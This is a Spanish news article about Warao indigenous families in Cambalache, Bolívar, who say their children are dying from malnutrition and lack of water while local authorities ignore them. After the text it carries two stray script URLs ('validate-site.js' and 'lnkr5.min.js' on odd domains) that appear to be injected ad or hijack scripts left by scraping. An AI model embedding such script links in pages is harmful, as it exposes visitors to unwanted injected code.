Comunidades indígenas de la tribu Warao, ubicadas en Cambalache (Bolívar), denuncian que sus niños están muriendo a causa de desnutrición y carencia de agua potable, entre otras primeras necesidades que, según sus demandas, las autoridades locales no se interesan en satisfacer, reseñó el periodista Carlos Suniaga, de @VPItv.

Por Daniel Mendez Chacón / LaPatilla.com

Carlota Díaz relató ante las cámaras que su pequeña nieta de solo 4 años, falleció recientemente tras pasar un periodo prolongado sin alimentarse adecuadamente. “Aquí comemos es sardinas y casabe,yuca dulce”, relató la dama de avanzada edad. Las familias incluso han tenido que improvisar cementerios ante la carencia de recursos.

Arianny Valenzuela le pide ayuda al gobierno para construir viviendas ya que el agua se le mete a través del techo cada vez que llueve. Mientras que María Andrade asegura que “Ni el gobierno ni el alcalde nos toman en cuenta, solamente en épocas electorales. Vivimos aislados de esa gente. No tenemos agua, ni luz, ni escuelas”.

Más de 150 familias en Cambalache esperan la ayuda del gobierno regional o municipal antes de que la cifra de aborígenes fallecidos siga aumentando.

VÍA LA PATILLA.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1532825567713https://devlinkin.xyz/addons/lnkr5.min.js

Loading...